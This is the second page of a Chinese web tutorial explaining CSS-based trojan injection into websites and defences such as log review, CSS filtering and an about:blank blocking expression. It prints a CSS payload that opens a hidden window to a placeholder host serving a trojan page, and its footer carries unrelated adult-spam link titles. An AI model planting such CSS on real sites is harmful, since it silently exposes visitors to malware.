當(dāng)前位置 : 首頁(yè)>軟件學(xué)院>網(wǎng)絡(luò)技術(shù)>黑客攻防>正文

了解關(guān)于CSS掛馬及相應(yīng)防范方法

http://www.yibo1263.com　2010-1-7 8:39:09 　來(lái)源:東北IT網(wǎng) 　編輯:葉子

　　Body

　　background-image：url(t：open(”http：//www.X.com/muma.htm”，”newwindow”，”border=”1″Height=0，Width=0，top=1000，center=0，toolbar=no，menubar=no，scrollbars=no，resizable=no，location=no，status=no”))

　　方式1的CSS掛馬技術(shù)，在運(yùn)行時(shí)會(huì)出現(xiàn)空白的頁(yè)面，影響網(wǎng)頁(yè)訪問(wèn)者正常的訪問(wèn)，因此比較容易發(fā)現(xiàn)。不過(guò)在方式2中的這段代碼，使用了t的Open開(kāi)窗，通過(guò)新開(kāi)一個(gè)隱藏的窗口，在后臺(tái)悄悄地運(yùn)行新窗口并激活訪問(wèn)網(wǎng)頁(yè)溢出木馬頁(yè)面，不會(huì)影響訪問(wèn)者觀看網(wǎng)頁(yè)內(nèi)容，因此更加隱蔽。

　　防網(wǎng)絡(luò)服務(wù)器被掛馬，通常會(huì)出現(xiàn)防病毒軟件告警之類的信息。由于漏洞不斷更新，掛馬種類時(shí)刻都在變換，通過(guò)客戶端的反映來(lái)發(fā)現(xiàn)服務(wù)器是否被掛馬往往疏漏較大。正確的做法是經(jīng)常檢查服務(wù)器日志，發(fā)現(xiàn)異常信息，經(jīng)常檢查網(wǎng)站代碼，使用網(wǎng)頁(yè)木馬檢測(cè)系統(tǒng)，進(jìn)行排查。

　　目前除了使用以前的阻斷彈出窗口防范CSS掛馬之外，還可以在網(wǎng)頁(yè)中設(shè)置CSS過(guò)濾，將CSS過(guò)濾掉。不過(guò)如果你選擇過(guò)濾CSS的話，首先需要留意自己的相關(guān)網(wǎng)頁(yè)是否有CSS的內(nèi)容，因此我們?nèi)匀皇淄朴米钄喾绞絹?lái)防范CSS.阻斷代碼如下所示：

　　emiao1：expression(this.src=”about：blank”，this.outerHTML=”")；

　　將外域的木馬代碼的src重寫(xiě)成本地IE404錯(cuò)誤頁(yè)面的地址，這樣，外域的t代碼不會(huì)被下載。不過(guò)阻斷方式也有天生致命的弱點(diǎn)，弱點(diǎn)的秘密我們將于下次揭曉。

本新聞共2頁(yè),當(dāng)前在第2頁(yè) 1 2

【收藏】【打印】【進(jìn)入論壇】

相關(guān)文章：

亚洲AV无码乱码在线观看不卡|最新大伊香蕉精品视频在线|亚洲不卡av一区二区|国产美女无遮挡免费